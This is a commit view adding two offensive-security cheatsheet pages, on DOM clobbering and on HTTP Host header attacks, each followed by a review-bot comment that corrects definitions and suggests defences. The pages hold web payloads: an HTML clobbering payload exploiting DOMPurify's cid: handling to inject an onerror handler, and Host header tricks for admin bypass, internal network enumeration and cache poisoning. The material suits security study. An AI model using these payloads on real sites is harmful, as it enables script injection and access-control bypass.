add dom clob and host header
xanhacks committed Dec 13, 2022
1 parent e780a02 commit dfa5527
Showing 2 changed files with 60 additions and 0 deletions.
33 changes: 33 additions & 0 deletions docs/web/dom-clobbering.md
@@ -0,0 +1,33 @@
---
title: DOM Clobbering
description: DOM Clobbering cheatsheet
---

## Definition

**DOM Clobbering** is a type of attack that involves **overwriting the properties of a Document Object Model (DOM)** object in a web page with malicious code. This can allow an attacker to execute arbitrary JavaScript code in the victim's browser, potentially leading to the theft of sensitive information or other malicious activities. The term "clobbering" refers to the way in which the attacker overwrites the properties of the DOM object, effectively "clobbering" the original values with their own. DOM Clobbering attacks are often used in conjunction with cross-site scripting (XSS) attacks, and can be difficult to defend against. It is important for web developers to be aware of this type of attack and take steps to prevent it.

## Cheatsheet

```html
<div id="defaultAvatar"></div>
<a id="defaultAvatar" name="avatar" href="cid:&quot;onerror=alert(1)//">
```

```javascript
window.defaultAvatar
// HTMLCollection(2) [div#defaultAvatar, a#defaultAvatar, defaultAvatar: div#defaultAvatar, avatar: a#defaultAvatar]
defaultAvatar
// HTMLCollection(2) [div#defaultAvatar, a#defaultAvatar, defaultAvatar: div#defaultAvatar, avatar: a#defaultAvatar]

defaultAvatar.avatar
// <a id="defaultAvatar" name="avatar" href="javascript:alert()"></a>
defaultAvatar.avatar + ''
// 'cid:"onerror=alert(1)//'
```

> `DOMPurify` allows you to use the `cid:` protocol, which does **not** URL-encode double-quotes.
## References

- [PortSwigger - DOM Clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering)
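Review bot: the console output shown for `defaultAvatar.avatar` (`<a id="defaultAvatar" name="avatar" href="javascript:alert()"></a>`) does not match the markup in the HTML block above it, where the anchor's `href` is `cid:&quot;onerror=alert(1)//`, nor the string conversion on the next line (`'cid:"onerror=alert(1)//'`); the output line should read `// <a id="defaultAvatar" name="avatar" href="cid:&quot;onerror=alert(1)//"></a>` so the example is internally consistent. The definition is also imprecise in a way the cheatsheet itself contradicts: clobbering does not overwrite DOM properties "with malicious code", it injects plain HTML whose `id`/`name` attributes create named globals (`window.defaultAvatar`, `defaultAvatar.avatar`) that shadow variables the page's script expects, which is why it matters even where script injection is blocked; a sentence to that effect, plus a defender note that code should not read configuration from bare globals that the DOM can define and that sanitizers should keep clobbering protection enabled, would make the page usable for fixing as well as finding the issue. Finally, a blank line is missing between the `> DOMPurify ...` blockquote and `## References`, so some Markdown renderers will fold the heading into the quote.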
27 changes: 27 additions & 0 deletions docs/web/host-header-attack.md
@@ -0,0 +1,27 @@

# Host header attack

## Definition

A **Host header attack** is a type of cyber attack in which an attacker manipulates the Host header of a request in order to trick a web server into thinking the request is coming from a different website. This can allow the attacker to access resources or information that they would not normally have access to, or to perform actions on the targeted website that they would not normally be able to do. The Host header is a field in the HTTP request header that specifies the domain name of the website that the client is trying to access. By modifying this field, an attacker can direct the server to respond to their request as if it were coming from a different website.

## Cheatsheet

- `Host: exploit-XXXX`
- `X-Forwarded-Host: exploit-XXXXX`
- `GET /admin` bypass with `Host: localhost`
- Enum local networks : `Host: 192.168.0.67`, from 1 to 255
- Absolute URL in path :

```
POST https://example.com/admin/delete HTTP/1.1
Host: 192.168.0.15
...
```

- Submit double Host header (link $HOST/resource/toto.js, spoof host in cache)
- Bypass host header check with `Connection: keep-alive`, [connection-state-attack](https://portswigger.net/web-security/host-header/exploiting/lab-host-header-host-validation-bypass-via-connection-state-attack)

## References

- [PortSwigger - HTTP Host header attacks](https://portswigger.net/web-security/host-header)
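Review bot: the definition misstates what the Host header does: it names the virtual host the client is addressing, so manipulating it does not make a request appear to "come from a different website"; the risk is that the server (or a cache, password-reset link generator, or routing layer) trusts the attacker-supplied value, which is what the cheatsheet bullets (`X-Forwarded-Host`, `Host: localhost` for `/admin`, cache poisoning via a double Host header) actually rely on. Rewording it that way also lets the page close with the corresponding defence, validating Host against an allowlist of expected hostnames and not honouring `X-Forwarded-Host` unless a trusted proxy sets it, which the file currently lacks. Smaller points: this file has no front-matter block (`title`/`description`) while `docs/web/dom-clobbering.md` does, and it starts with a blank line before `# Host header attack`; the placeholders `exploit-XXXX` and `exploit-XXXXX` should use the same number of `X`s; the request fence has no language tag (`http`) whereas the other file tags its fences; and the `Host: 192.168.0.67`, from 1 to 255 bullet should say that it is the last octet being iterated.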
